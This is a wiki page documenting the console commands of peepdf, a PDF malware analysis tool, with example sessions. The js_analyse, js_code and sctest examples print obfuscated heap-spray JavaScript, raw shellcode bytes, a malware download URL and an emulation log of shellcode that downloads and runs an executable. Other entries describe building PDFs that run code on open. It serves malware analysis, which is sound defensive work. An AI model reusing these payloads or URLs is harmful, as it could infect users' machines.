Skip to content

Commands

Jose Miguel Esparza edited this page Apr 15, 2015 · 5 revisions

Console commands


There are a lot of commands that can be used in the interactive console of peepdf and here there is an explanation of all of them: ### Showing information ### * [bytes](#bytes) * [changelog](#changelog) * [errors](#errors) * [hash](#hash) * [info](#info) * [metadata](#metadata) * [object](#object) * [offsets](#offsets) * [rawobject](#rawobject) * [rawstream](#rawstream) * [references](#references) * [save\_version](#save_version) * [stream](#stream) * [tree](#tree)

Creation/Modification

Javascript analysis

Shellcode analysis

Misc

Console


bytes

Usage: bytes offset num_bytes [file]

Show or store in the specified file "num_bytes" of the file beginning from "offset"
PPDF> bytes 0 100

%PDF-1.1

1 0 obj
<</Type /Catalog
/Pages 2 0 R
>>
endobj

2 0 obj
<</Type /Pages
/Kids [ 3 0 R ]
/C

Index

changelog

Usage: changelog [version]

Show the changelog of the document or version of the document
PPDF> changelog

Changes in version 1:
	Producer: Acrobat Web Capture 8.0
	Modification date: 2009-03-05T21:46:22+08:00
	Added objects: [48]
	Modified objects: [27, 29, 31]

Index

create

Usage: create pdf simple|(open_action_js [js_file])

Create a new simple PDF file or one with Javascript code to be executed when opening the file. It's possible to specify
the file where the Javascript code is stored or do it manually.
PPDF> create pdf open_action_js

Please, specify the Javascript code you want to include in the file (if the code includes EOL characters use a
js_file instead):

app.alert("Hello World!!",3);

PDF structure created successfully!!

The Javascript code specified here will be executed when the document is opened.

Usage: create object_stream [version]

Create an object stream choosing the objects to be compressed.
PPDF> create object_stream
Warning: stream objects cannot be compressed. If the Catalog object is compressed could lead to corrupted
files for Adobe Reader!!
Which objects do you want to compress? (Valid respones: all | 1-5 | 1,2,5,7,8) all

*** Warning: Stream objects cannot be compressed!!

The object stream has been created successfully

Here it's important to highlight that despite the warnings the objects are compressed successfully, but the PDF specification says that stream objects cannot be compressed.

decode

Usage: decode variable var_name filter1 [filter2 ...]
Usage: decode file file_name filter1 [filter2 ...]
Usage: decode raw offset num_bytes filter1 [filter2 ...]

Decode the content of the specified variable, file or raw bytes using the following filters or algorithms:
	base64,b64: Base64
	asciihex,ahx: /ASCIIHexDecode
	ascii85,a85: /ASCII85Decode
	lzw: /LZWDecode
	flatedecode,fl: /FlateDecode
	runlength,rl: /RunLengthDecode
	ccittfax,ccf: /CCITTFaxDecode
	jbig2: /JBIG2Decode (Not implemented)
	dct: /DCTDecode (Not implemented)
	jpx: /JPXDecode (Not implemented)
PPDF> bytes 70 37

78 9c 4b 2c 28 d0 4b cc 49 2d 2a d1 50 f2 48 cd   |x.K,(.K.I-*.P.H.|
c9 c9 57 08 cf 2f ca 49 51 54 54 d2 31 d6 b4 06   |..W../.IQTT.1...|
00 96 69 09 15                                    |..i..|

PPDF> decode raw 70 37 fl

app.alert("Hello World!!",3);

Index

decrypt

Usage: decrypt $password

Decrypts the file with the specified password

### embed ### ``` Usage: embed [-x] filename [file_type]

Embed the specified file in the actual PDF file. The default type is "application/pdf".

Options: -x: The file is executed when the actual PDF file is opened

[Index](#showing-information)
<br />
### encode ###

Usage: encode variable var_name filter1 [filter2 ...] Usage: encode file file_name filter1 [filter2 ...] Usage: encode raw offset num_bytes filter1 [filter2 ...]

Encode the content of the specified variable, file or raw bytes using the following filters or algorithms: base64,b64: Base64 asciihex,ahx: /ASCIIHexDecode ascii85,a85: /ASCII85Decode (Not implemented) lzw: /LZWDecode flatedecode,fl: /FlateDecode runlength,rl: /RunLengthDecode (Not implemented) ccittfax,ccf: /CCITTFaxDecode (Not implemented) jbig2: /JBIG2Decode (Not implemented) dct: /DCTDecode (Not implemented) jpx: /JPXDecode (Not implemented)

PPDF> bytes 49 29

app.alert("Hello World!!",3);

PPDF> encode raw 49 29 fl

78 9c 4b 2c 28 d0 4b cc 49 2d 2a d1 50 f2 48 cd |x.K,(.K.I-*.P.H.| c9 c9 57 08 cf 2f ca 49 51 54 54 d2 31 d6 b4 06 |..W../.IQTT.1...| 00 96 69 09 15 |..i..|

[Index](#showing-information)
<br />
### encode\_strings ###

Usage: encode_strings [id|trailer [version]]

Encode the strings and names included in the file, object or trailer

PPDF> rawobject 2

<< /Kids [ 3 0 R ] /Type /Pages /Count 1 >>

PPDF> encode_strings 2

Object encoded successfully

PPDF> rawobject 2

<< /#4b#69#64#73 [ 3 0 R ] /#54#79#70#65 /#50#61#67#65#73 /#43#6f#75#6e#74 1 >>

PPDF> rawobject 4

(This is a test string object!!)

PPDF> encode_strings 4

Object encoded successfully

PPDF> rawobject 4

(\124\150\151\163\040\151\163\040\141\040\164\145\163\164\040\163\164\162\151\156\147\040\157\142\152\145\143\164\041\041)

[Index](#showing-information)
<br />
### encrypt ###

Usage: encrypt [password]

Encrypt the file with the default or specified password

[Index](#showing-information)
<br />
### errors ###

Usage: errors [object_id|xref|trailer [version]]

Shows the errors of the file or object (object_id, xref, trailer)

PPDF> errors

Bad object for /XObject key (1) No entries in xref section (1)

[Index](#showing-information)
<br />
### exit ###

Usage: exit

Exits from the console

[Index](#showing-information)
<br />
### filters ###

Usage: filters object_id [version] [filter1 [filter2 ...]]

Shows the filters found in the stream object or set the filters in the object (first filter is used first). The valid values for filters are the following: none: No filters asciihex,ahx: /ASCIIHexDecode ascii85,a85: /ASCII85Decode (Not implemented) lzw: /LZWDecode flatedecode,fl: /FlateDecode runlength,rl: /RunLengthDecode (Not implemented) ccittfax,ccf: /CCITTFaxDecode (Not implemented) jbig2: /JBIG2Decode (Not implemented) dct: /DCTDecode (Not implemented) jpx: /JPXDecode (Not implemented)

PPDF> rawobject 5

<< /Length 37 /Filter /FlateDecode >> stream x�K,(�K�I-*�P�H����/�IQTT�1ִ�i endstream

PPDF> filters 5

/FlateDecode

PPDF> filters 5 none

<< /Length 29 >> stream app.alert("Hello World!!",3); endstream

PPDF> rawobject 5

<< /Length 29 >> stream app.alert("Hello World!!",3); endstream

PPDF> filters 5

*** Warning: No filters found in the object!!

PPDF> filters 5 fl ahx

<< /Length 74 /Filter [ /ASCIIHexDecode /FlateDecode ] >> stream 789c4b2c28d04bcc492d2ad150f248cdc9c95708cf2fca49515454d231d6b4060096690915 endstream

[Index](#showing-information)
<br />
### hash ###

Usage: hash object|rawobject|stream|rawstream object_id [version] Usage: hash raw offset size Usage: hash file fileName Usage: hash variable varName

Generates the hash (MD5/SHA1/SHA256) of the specified source: raw bytes of the file, objects and streams, and the content of files or variables

PPDF> hash rawstream 10

MD5: 9212aff46b662808a613f11b4d9d3673 SHA1: 1fbf5269f10a36f4863cfa4e14188537efd23ca1 SHA256: 7b2b2f2b33ec2531769bd457f20d13e177aee04ac59a06a02fad1a7abcfa4c14

PPDF> hash variable myVar

MD5: 852ce9336716bd31de5fca2587c2f156 SHA1: 7632ca7738817cf66d8f772430be8db7b00aac96 SHA256: b2a4305f1fa2d2d1a1bb363cbb1e6680161d78b89beb3aafe160ff1d694426b2

### help ###

Usage: help [command]

Show the available commands or the usage of the specified command

[Index](#showing-information)
<br />
### info ###

Usage: info [object_id|xref|trailer [version]]

Shows information of the file or object (object_id, xref, trailer)

PPDF> info

File: js_stream.pdf MD5: 46f01049fb8f87c535cc96185fe9d702 Size: 458 bytes Version: 1.6 Binary: True Linearized: False Encrypted: False Updates: 0 Objects: 5 Streams: 1 Comments: 0 Errors: 0

Version 0: Catalog: 1 Info: No Objects (5): [1, 2, 3, 4, 5] Streams (1): [5] Encoded (1): [5] Suspicious elements: /OpenAction: [1] /JS: [4] /JavaScript: [4]

PPDF> info 1

Offset: 17 Size: 66 Object: dictionary Type: /Catalog References: ['2 0 R', '4 0 R']

PPDF> info trailer

Offset: 406 Size: 46 Stream: No Objects: 6 Root Object: 1 Info Object: No Encrypted: No

[Index](#showing-information)
<br />
### js\_analyse ###

Usage: js_analyse variable var_name Usage: js_analyse file file_name Usage: js_analyse object object_id [version]

Analyses the Javascript code stored in the specified variable, file or object

This command perform some substitutions in the code in order to obtain the last stage of the Javascript code and search
for escaped bytes and shellcodes. It's not always possible to be successful with this analysis, so maybe a manual
approach with other commands will be necessary.

PPDF> js_analyse object 13

Javascript code:

var tX1PnUHy = new Array(); function lRUWC(E79yB, NPvAvQ){ while (E79yB.length * 2 < NPvAvQ){ E79yB += E79yB; } E79yB = E79yB.substring(0, NPvAvQ / 2); return E79yB; } function YVYohZTd(bBeUHg){ var NTLv7BP = 0x0c0c0c0c; rpifVgf = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" + "%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64"+ "%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787"+ "%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3"+ "%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" + "%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66"+ "%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef"+ "%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64"+ "%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf..."

Unescaped bytes: 43 43 43 43 eb 0f 5b 33 c9 66 b9 80 01 80 33 ef |CCCC..[3.f....3.| 43 e2 fa eb 05 e8 ec ff ff ff 7f 8b 4e df ef ef |C.........�.N...| ef 64 af e3 64 9f f3 42 64 9f e7 6e 03 ef eb ef |.d..d..Bd..n....| ef 64 03 b9 87 61 a1 e1 03 07 11 ef ef ef 66 aa |.d...a........f.| eb b9 87 77 11 65 e1 07 1f ef ef ef 66 aa e7 b9 |...w.e......f...| 87 ca 5f 10 2d 07 0d ef ef ef 66 aa e3 b9 87 00 |.._.-.....f.....| 21 0f 8f 07 3b ef ef ef 66 aa ff b9 87 2e 96 0a |!...;...f.......| 57 07 29 ef ef ef 66 aa fb af 6f d7 2c 9a 15 66 |W.)...f...o.,..f| aa f7 06 e8 ee ef ef b1 66 9a cb 64 aa eb 85 ee |........f..d....| b6 64 ba f7 b9 07 64 ef ef ef bf 87 d9 f5 c0 9f |.d....d.........| 07 78 ef ef ef 66 aa f3 64 2a 6c 2f bf 66 aa cf |.x...f..dl/.f..| 87 10 ef ef ef bf 64 aa fb 85 ed b6 64 ba f7 07 |......d.....d...| 8e ef ef ef ec aa cf 28 ef b3 91 c1 8a 28 af eb |.......(.....(..| 97 8a ef ef 10 9a cf 64 aa e3 85 ee b6 64 ba f7 |.......d.....d..| 07 af ef ef ef 85 e8 b7 ec aa cb dc 34 bc bc 10 |............4...| 9a cf bf bc 64 aa f3 85 ea b6 64 ba f7 07 cc ef |....d.....d.....| ef ef 85 ef 10 9a cf 64 aa e7 85 ed b6 64 ba f7 |.......d.....d..| 07 ff ef ef ef 85 10 64 aa ff 85 ee b6 64 ba f7 |.......d.....d..| 07 ef ef ef ef ae b4 bd ec 0e ec 0e ec 0e ec 0e |................| 6c 03 eb b5 bc 64 35 0d 18 bd 10 0f ba 64 03 64 |l....d5......d.d| 92 e7 64 b2 e3 b9 64 9c d3 64 9b f1 97 ec 1c b9 |..d...d..d......| 64 99 cf ec 1c dc 26 a6 ae 42 ec 2c b9 dc 19 e0 |d.....&..B.,....| 51 ff d5 1d 9b e7 2e 21 e2 ec 1d af 04 1e d4 11 |Q......!........| b1 9a 0a b5 64 04 64 b5 cb ec 32 89 64 e3 a4 64 |....d.d...2.d..d| b5 f3 ec 32 64 eb 64 ec 2a b1 b2 2d e7 ef 07 1b |...2d.d...-....| 11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 70 3a 2f |..........http:/| 2f 62 69 6b 70 61 6b 6f 63 2e 63 6e 2f 6e 75 63 |/bikpakoc.cn/nuc| 2f 65 78 65 2e 70 68 70 |/exe.php|

URLs in shellcode: http://bikpakoc.cn/nuc/exe.php

[Index](#showing-information)
<br />
### js\_beautify ###

Usage: js_beautify variable var_name Usage: js_beautify file file_name Usage: js_beautify object object_id [version]

Beautifies the Javascript code stored in the specified variable, file or object

PPDF> stream 15

function yyy(){while(1>2) ;}

function datagood(a,b) { if (a>b) {datagood(a,b)} if (b>a) {datagood(a,b)} return a; }

PPDF> js_beautify object 15

function yyy() { while (1 > 2); }

function datagood(a, b) { if (a > b) { datagood(a, b) } if (b > a) { datagood(a, b) } return a; }

<br />
### js\_code ###

Usage: js_code object_id [version]

Shows the Javascript code found in the object

If the Javascript code found in the object can be executed and generates another Javascript code stage all
the stages can be shown.

PPDF> js_code 13

There are more than one Javascript code, do you want to see all (1) or just the last one (2)? 1

================== Original Javascript code ================== function nofaq(lgc){var ppwsd="";for(rxr=0;rxr<lgc.length;rxr+=2){ ppwsd+=(String.fromCharCode(parseInt(lgc.substr(rxr,5),19))); } eval(ppwsd); } nofaq("0D0A6452...");

================== Next stage of Javascript code ==================

var tX1PnUHy = new Array(); function lRUWC(E79yB, NPvAvQ){ while (E79yB.length * 2 < NPvAvQ){ E79yB += E79yB; } E79yB = E79yB.substring(0, NPvAvQ / 2); return E79yB; } function YVYohZTd(bBeUHg){ var NTLv7BP = 0x0c0c0c0c; rpifVgf = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001..."); if (bBeUHg == 1){NTLv7BP = 0x30303030;}

	var i388Ag8 = 0x400000;
	var JKn0PaC = rpifVgf.length * 2;
	var NPvAvQ = i388Ag8 - (JKn0PaC + 0x38);
	var E79yB = unescape("%u9090%u9090");
	E79yB = lRUWC(E79yB, NPvAvQ);
	var fwdFfLgn = (NTLv7BP - 0x400000) / i388Ag8;
	for (var HEUAQgED = 0; HEUAQgED < fwdFfLgn; HEUAQgED ++ ){
	tX1PnUHy[HEUAQgED] = E79yB + rpifVgf;

} } ...

[Index](#showing-information)
<br />
### js\_eval ###

Usage: js_eval variable var_name Usage: js_eval file file_name Usage: js_eval object object_id [version]

Executes the Javascript code stored in the specified variable, file or object

PPDF> set jscode "var a = 8; a = a + 2; print('The content of the variable is '+a);" PPDF> js_eval variable jscode The variable may not contain Javascript code, do you want to continue? (y/n) y The content of the variable is 10

First, we put Javascript code in a variable. After that we can use the _js\_eval_ command to execute it. There is a warning
because the code is very short to be identified as Javascript code.
<br />
### js\_jjdecode ###

Usage: js_jjdecode variable $var_name Usage: js_jjdecode file $file_name Usage: js_jjdecode object $object_id [$version]

Decodes the Javascript code stored in the specified variable, file or object using the jjencode/decode algorithm by Yosuke Hasegawa (http://utf-8.jp/public/jjencode.html)

PPDF> show encoded_stream

Q=~[];Q={:++Q,$$$$:(![]+"")[Q],$:++Q,$$:(![]+"")[Q],$:++Q,$$$:({}+"")[Q],$$$:(Q[Q]+"")[Q],$$:++Q,$$$:(!""+"")[Q],$__:++Q,$$:++Q,$$:({}+"")[Q],$$:++Q,$$$:++Q,$:++Q,$$:++Q};Q.$=(Q.$=Q+"")[Q.$$]+(Q.$=Q.$_[Q.$])+(Q.$$=(Q.$+"")[Q.$])+((!Q)+"")[Q._$$]+(Q.=Q.$[Q.$$])+(Q.$=(!""+"")[Q.$])+(Q.=(!""+"")[Q.$])+Q.$[Q.$_$]+Q.+Q.$+Q.$;Q.$$=Q.$+(!""+"")[Q.$$]+Q.__+Q._+Q.$+Q.$$; [...]

PPDF> js_jjdecode variable encoded_stream

var shellcode = unescape("%u00E8..."); var executable = ""; var rop9 = ""; rop9 += unescape("%u313d%u4a82"); rop9 += unescape("%ua713%u4a82"); rop9 += unescape("%u1f90%u4a80"); [...]

<br />
### js\_join ###

Usage: js_join variable var_name Usage: js_join file file_name

Joins some strings separated by quotes and stored in the specified variable or file in a unique one

Example:

aux = "%u65"+"54"+"%u74"+"73"

js_join variable aux

%u6554%u7473

[Index](#showing-information)
<br />
### js\_unescape ###

Usage: js_unescape variable var_name Usage: js_unescape file file_name

Unescapes the escaped characters stored in the specified variable or file

Example:

aux = "%u6554%u7473"

js_unescape variable aux

54 65 73 74 |Test|

[Index](#showing-information)
<br />
### js\_vars ###

Usage: js_vars [$var_name]

Shows the Javascript variables defined in the execution context or the content of the specified variable

PPDF> js_vars

['shellcode', 'executable', 'rop9', 'rop10', 'rop11', 'r11', 'obj_size', 'rop', 'ret_addr', 'rop_addr', 'r_addr', 'payload', 'vv', 'part1', 'part2', 'part2_len', 'arr', 'heapSpray', 'evalCode']

PPDF> js_vars obj_size

844

<br />
### log ###

Usage: log

Show the actual state of logging

Usage: log stop

Stop logging

Usage: log log_file

Starts logging in the specified file

[Index](#showing-information)
<br />
### malformed\_output ###

Usage: malformed_output [option1 [option2 ...] [header_file]]

Enable malformed output when saving the file:

0: Removes all the malformed options.
1 [header_file]: Enable all the implemented tricks. Default option.
2 [header_file]: Puts the default or specified header before the PDF header.
3: Removes all the "endobj" tags.
4: Removes all the "endstream" tags.
5: Removes the "xref" section.
6: Bad header: %PDF-1
[Index](#showing-information)
<br />
### metadata ###

Usage: metadata [version]

Show the metadata of the document or version of the document

PPDF> metadata

Info Object in version 0:

<< /Title /ModDate 2008312053854 /CreationDate 2008312053854 /Producer Scribus PDF Library 1.3.3.12 /Trapped /False /Creator Scribus 1.3.3.12 /Keywords /Author >>

[Index](#showing-information)
<br />
### modify ###

Usage: modify object|stream id [version] [file]

Modify the object or stream specified. It's possible to use a file to retrieve the stream content (ONLY for stream content).

PPDF> object 4

<< /Kids [ 9 0 R ] /Count 1 /Resources 8 0 R /Type /Pages >>

PPDF> modify object 4

Key: /Kids Raw value: [ 9 0 R ]

Do you want to modify, delete or make no action? (m/d/n) n

Key: /Count Raw value: 1 Value: 1

Do you want to modify, delete or make no action? (m/d/n) m

Raw value: 1

Do you want to modify, delete or make no action? (m/d/n) m

Please, specify the number object content:

18

Key: /Resources Raw value: 8 0 R

Do you want to modify, delete or make no action? (m/d/n) m

Raw value: 8 0 R

Do you want to modify, delete or make no action? (m/d/n) m

Please, specify the reference object content:

1 0 R

Key: /Type Raw value: /Pages

Do you want to modify, delete or make no action? (m/d/n) n

Do you want to add more entries? (y/n) n

Object modified successfully!!

PPDF> object 4

<< /Kids [ 9 0 R ] /Count 18 /Resources 1 0 R /Type /Pages >>

[Index](#showing-information)
<br />
### object ###

Usage: object object_id [version]

Shows the content of the object after being decoded and decrypted.

PPDF> object 1 0

<< /AcroForm 5 0 R /Threads 2 0 R /Names 7 0 R /OpenAction << /S /JavaScript /JS this.uSQXcfcd2() >> /Pages 4 0 R /Outlines 3 0 R /Type /Catalog /PageLayout /SinglePage /Dests 6 0 R /ViewerPreferences << /PageDirection /L2R >> >>

[Index](#showing-information)
<br />
### offsets ###

Usage: offsets [num_version]

Shows the physical map of the file or the specified version of the document

The output of this command shows in a visual way the physical structure of the document. We can see
the starting and ending offsets and the size of the elements (in brackets).

PPDF> offsets

   0 Header
  17
    Object  1 (260)
 276
 279
    Object  2 (19)
 297
 300
    Object  3 (48)
 347
 350
    Object  4 (77)
 426
 430
    Object  5 (33)
 462
 465
    Object  6 (21)
 485
 488
    Object  7 (41)
 528
 531
    Object  8 (68)
 598
 601
    Object  9 (187)
 787
 790
    Object  10 (52)
 841
 844
    Object  11 (85)
 928
 931
    Object  12 (50)
 980
 983
    Object  13 (5903)
6885
6887
    Object  14 (204)
7090
7093
    Xref Section (325)
7417
7420
    Trailer (69)
7488
7489 EOF
[Index](#showing-information)
<br />
### open ###

Usage: open [-fl] filename

Open and parse the specified file

Options: -f: Sets force parsing mode to ignore errors -l: Sets loose parsing mode for problematic files

[Index](#showing-information)
<br />
### quit ###

Usage: quit

Exits from the console

[Index](#showing-information)
<br />
### rawobject ###

Usage: rawobject [object_id|xref|trailer [version]]

Show the content of the object without being decoded or decrypted (object_id, xref, trailer)

PPDF> rawobject xref

xref 0 15 0000000000 65535 f 0000000015 00000 n 0000000261 00000 n 0000000279 00000 n 0000000324 00000 n 0000000397 00000 n 0000000428 00000 n 0000000448 00000 n 0000000487 00000 n 0000000553 00000 n 0000000731 00000 n 0000000781 00000 n 0000000862 00000 n 0000000909 00000 n 0000004186 00000 n

PPDF> rawobject trailer

trailer << /Size 15 /Info 14 0 R /Root 1 0 R >> startxref 4374 %%EOF

PPDF> rawobject 4

<< /Kids [ 9 0 R ] /Count 18 /Resources 1 0 R /Type /Pages >>

[Index](#showing-information)
<br />
### rawstream ###

Usage: rawstream object_id [version]

Shows the stream content of the specified document version before being decoded and decrypted

PPDF> rawstream 1

78 9c 45 8e c1 0a 83 30 10 44 ef f9 8a f9 83 4d |x.E....0.D.....M| 5a 15 0b 22 b4 de 2c a5 a2 bd 15 0f c1 06 09 14 |Z.."..,.........| 23 1a 4b fb f7 5d 6b a0 2c 7b d8 61 e6 ed 28 48 |#.K..]k.,{.a..(H| ec 10 2b ec 71 88 10 41 25 29 b2 0c 74 fb 8c 06 |..+.q..A%)..t...| 54 68 af 9f ae 17 54 e9 de cc 6c 94 a8 05 5d 47 |Th....T...l...]G| 33 1c 3b 6f dd c0 01 56 90 e7 6b e4 6c 1f 33 ee |3.;o...V..k.l.3.| 0c 5a a5 56 04 c4 2f 29 a8 70 cb e0 a1 82 b5 d2 |.Z.V../).p......| 93 e1 33 f0 fe 46 41 b5 99 dd 32 75 fc 8c 7d 79 |..3..FA...2u..}y| 2e e8 62 1e 56 9f dc 9b c9 92 27 91 12 29 6f 1b |..b.V.....'..)o.| 48 5b 76 6b 23 a8 01 95 fa a5 9b 6e b2 a3 17 54 |H[vk#......n...T| 36 88 43 c1 2f a0 0d 3e 09 0a |6.C./..>..|

PPDF> stream 1

1 0 2 51 3 94 4 168 << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >><< /Kids [ 3 0 R ] /Type /Pages /Count 1 >><< /Parent 2 0 R /Type /Page /Resources << >> /MediaBox [ 0 0 600 800 ] >><< /Type /Action /S /JavaScript /JS 5 0 R >>

[Index](#showing-information)
<br />
### references ###

Usage: references to|in object_id [version]

Shows the references in the object or to the object in the specified version of the document

PPDF> references in 2

['3 0 R']

PPDF> object 2

<< /Kids [ 3 0 R ] /Type /Pages /Count 1 >>

PPDF> references to 2

[1, 3]

PPDF> object 3

<< /Parent 2 0 R /Type /Page /Resources << >> /MediaBox [ 0 0 600 800 ] >>

[Index](#showing-information)
<br />
### replace ###

Usage: replace all string1 string2

Replace 'string1' with 'string2' in the whole PDF file

Usage: replace variable var_name string1 string2 Usage: replace file file_name string1 string2

Replace 'string1' with 'string2' in the content of the specified variable or file

PPDF> object 2

<< /Kids [ 3 0 R ] /Type /Pages /Count 1 >>

PPDF> object 3

<< /Parent 2 0 R /Type /Page /Resources << >> /MediaBox [ 0 0 600 800 ] >>

PPDF> replace all Page OtherWord

The string has been replaced correctly

PPDF> object 2

<< /Kids [ 3 0 R ] /Type /OtherWords /Count 1 >>

PPDF> object 3

<< /Parent 2 0 R /Type /OtherWord /Resources << >> /MediaBox [ 0 0 600 800 ] >>

PPDF> set myvar "Hello World" PPDF> replace variable myvar Hello Bye

The string has been replaced correctly

PPDF> show myvar

Bye World

[Index](#showing-information)
<br />
### reset ###

Usage: reset

Cleans the console

Usage: reset var_name

Resets the variable value to the default value if applicable

It's specially useful when we change the standard ouput of the console to a file or variable to
restore it to the normal output. See [set](#set) command.

PPDF> reset output

output = "stdout"

[Index](#showing-information)
<br />
### save ###

Usage: save [filename]

Saves the file to disk

It's recommended to use this command when we make modifications in the document to keep it free of
conflicts. For example, if we don't save the changes we can have inconsistent results when we use
"object" and "rawobject" commands, because one of them is related to the file before the modifications
and the other one after them.
<br />
### save\_version ###

Usage: save_version num_version filename

Saves the selected file version to disk

[Index](#showing-information)
<br />
### sctest ###

Usage: sctest variable var_name Usage: sctest file file_name Usage: sctest raw offset num_bytes

Wrapper of the sctest tool (libemu) to emulate shellcodes

PPDF> sctest file /tmp/shellcode

verbose = 0 Hook me Captain Cook! userhooks.c:127 user_hook_ExitThread ExitThread(32) stepcount 9172 FARPROC WINAPI GetProcAddress ( HMODULE hModule = 0x7c800000 => none; LPCSTR lpProcName = 0x0041767d => = "GetSystemDirectoryA"; ) = 0x7c814eea; FARPROC WINAPI GetProcAddress ( HMODULE hModule = 0x7c800000 => none; LPCSTR lpProcName = 0x00417691 => = "WinExec"; ) = 0x7c86136d; FARPROC WINAPI GetProcAddress ( HMODULE hModule = 0x7c800000 => none; LPCSTR lpProcName = 0x00417699 => = "ExitThread"; ) = 0x7c80c058; FARPROC WINAPI GetProcAddress ( HMODULE hModule = 0x7c800000 => none; LPCSTR lpProcName = 0x004176a4 => = "LoadLibraryA"; ) = 0x7c801d77; HMODULE LoadLibraryA ( LPCTSTR lpFileName = 0x004176b1 => = "urlmon"; ) = 0x7df20000; FARPROC WINAPI GetProcAddress ( HMODULE hModule = 0x7df20000 => none; LPCSTR lpProcName = 0x004176b8 => = "URLDownloadToFileA"; ) = 0x7df7b0bb; UINT GetSystemDirectory ( LPTSTR lpBuffer = 0x0012fe7c => none; UINT uSize = 32; ) = 19; HRESULT URLDownloadToFile ( LPUNKNOWN pCaller = 0x00000000 => none; LPCTSTR szURL = 0x004176cb => = "http://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe"; LPCTSTR szFileName = 0x0012fe7c => = "c:\WINDOWS\system32\a.exe"; DWORD dwReserved = 0; LPBINDSTATUSCALLBACK lpfnCB = 0; ) = 0; UINT WINAPI WinExec ( LPCSTR lpCmdLine = 0x0012fe7c => = "c:\WINDOWS\system32\a.exe"; UINT uCmdShow = 0; ) = 32; void ExitThread ( DWORD dwExitCode = 32; ) = 0;

[Index](#showing-information)
<br />
### search ###

Usage: search [hex] string

Search the specified string or hexadecimal string in the objects (decoded and encrypted streams included)

Example: search hex \x34\x35

PPDF> search javascript

[4]

PPDF> search hex \x4a\x61\x76\x61

[4]

[Index](#showing-information)
<br />
### set ###

Usage: set [var_name var_value]

Sets the specified variable value or creates one with this value. Without parameters all the variables are shown.

Special variables:

header_file: READ ONLY. Specifies the file header to be used when 'malformed_options' are active.

malformed_options: READ ONLY. Variable to store the malformed options used to save the file.

output_limit: variable to specify the maximum number of lines to be shown at once when the output is long. 

By default there is no limit.

~~Thanks to this command it's possible to store the result of the rest of commands or anything we want in a
variable or in a file.~~ The "set output" way to store the commands output has been deprecated, use instead ">" and ">>" for files, and "$>" and "$>>" for variables:

PPDF> rawstream 5

78 da 05 c1 7b 7f 6a 60 00 00 e0 cf 72 dc 5e 8b |x...{�j....r.^.| 5a 26 22 8a 37 62 ea 87 cd ad 8b cb ab 25 e4 54 |Z&".7b.......%.T| a7 da fa 77 9f fd 3c cf 92 bd 3f 18 bd 89 47 50 |...w..<...?...GP| 69 69 d2 81 34 6b 3b f5 c2 17 cc d3 6b bb 90 f8 |ii..4k;.....k...| b7 b0 f5 5e 58 48 7c 7f 84 1a 1c b8 ed f9 4e 23 |...^XH|�......N#| 40 2a 68 5e 43 af eb 7b 8e f2 35 cb f0 2a 2b 3f |@*h^C..{..5..*+?| 41 95 64 b0 a9 af d8 a1 f0 af 51 eb 39 e3 b7 34 |A.d.......Q.9..4| 2a 84 9d 41 1c 5f ad 59 82 3b fd e9 4a 35 39 9b |*..A._.Y.;..J59.| db 30 64 3e 92 d4 6c 21 98 e4 0b 2b 31 e7 e8 6e |.0d>..l!...+1..n| 21 89 2e f6 d4 96 57 b4 54 1e 26 61 b7 b6 16 93 |!.....W.T.&a....| 67 68 b8 be 8b 79 f1 fe 82 ee eb e2 99 92 f7 68 |gh...y.........h| b0 b4 5c 14 10 dc 38 3f dc f8 d0 ac 60 ff 36 a5 |..\...8?.....6.| d6 d8 e3 b2 61 75 0c 2b 1f a6 b6 17 5a cd ea 3a |....au.+....Z..:| 7f ff a3 11 b6 38 e0 29 5c e0 6e 72 a9 73 1b 6d |�....8.).nr.s.m| 2e c7 9c 92 83 a3 48 96 bb 3f cc 64 85 af a8 44 |......H..?.d...D| 92 ed a6 50 e9 56 fa 4b f5 6f e2 67 e0 43 e6 56 |...P.V.K.o.g.C.V| 7d d8 58 10 a9 70 a8 e0 3b 25 d1 29 e3 ab 2a 7b |}.X..p..;%.)..{| f2 2a bd c8 9d c1 51 64 80 d5 8c e0 70 f6 74 0b |.....Qd....p.t.| bc 73 47 52 c8 e3 3a 2c 66 2f c1 bf 1f 10 27 ea |.sGR..:,f/....'.| ee 31 b2 4c 15 80 51 c5 1e 76 bc 7b 9a 65 c4 7b |.1.L..Q..v.{.e.{| ef a4 20 66 b9 42 43 8e 96 3b 28 9e 45 4b a2 c4 |.. f.BC..;(.EK..| a9 21 74 6c 93 15 44 b9 05 5a 63 e7 66 d4 a8 48 |.!tl..D..Zc.f..H| 2e e7 39 18 c7 c6 58 19 82 0d 16 7c 5f 7b c7 8b |..9...X....|_{..| 8a ab 6b 2f e5 eb 24 3c 6c f5 8a d8 ca 68 51 3c |..k/..$<l....hQ<| 9e cb 89 f3 3b fb 0f 6c d4 7d d7 0d 0a |....;..l.}...|

PPDF> rawstream 5 $> stream5

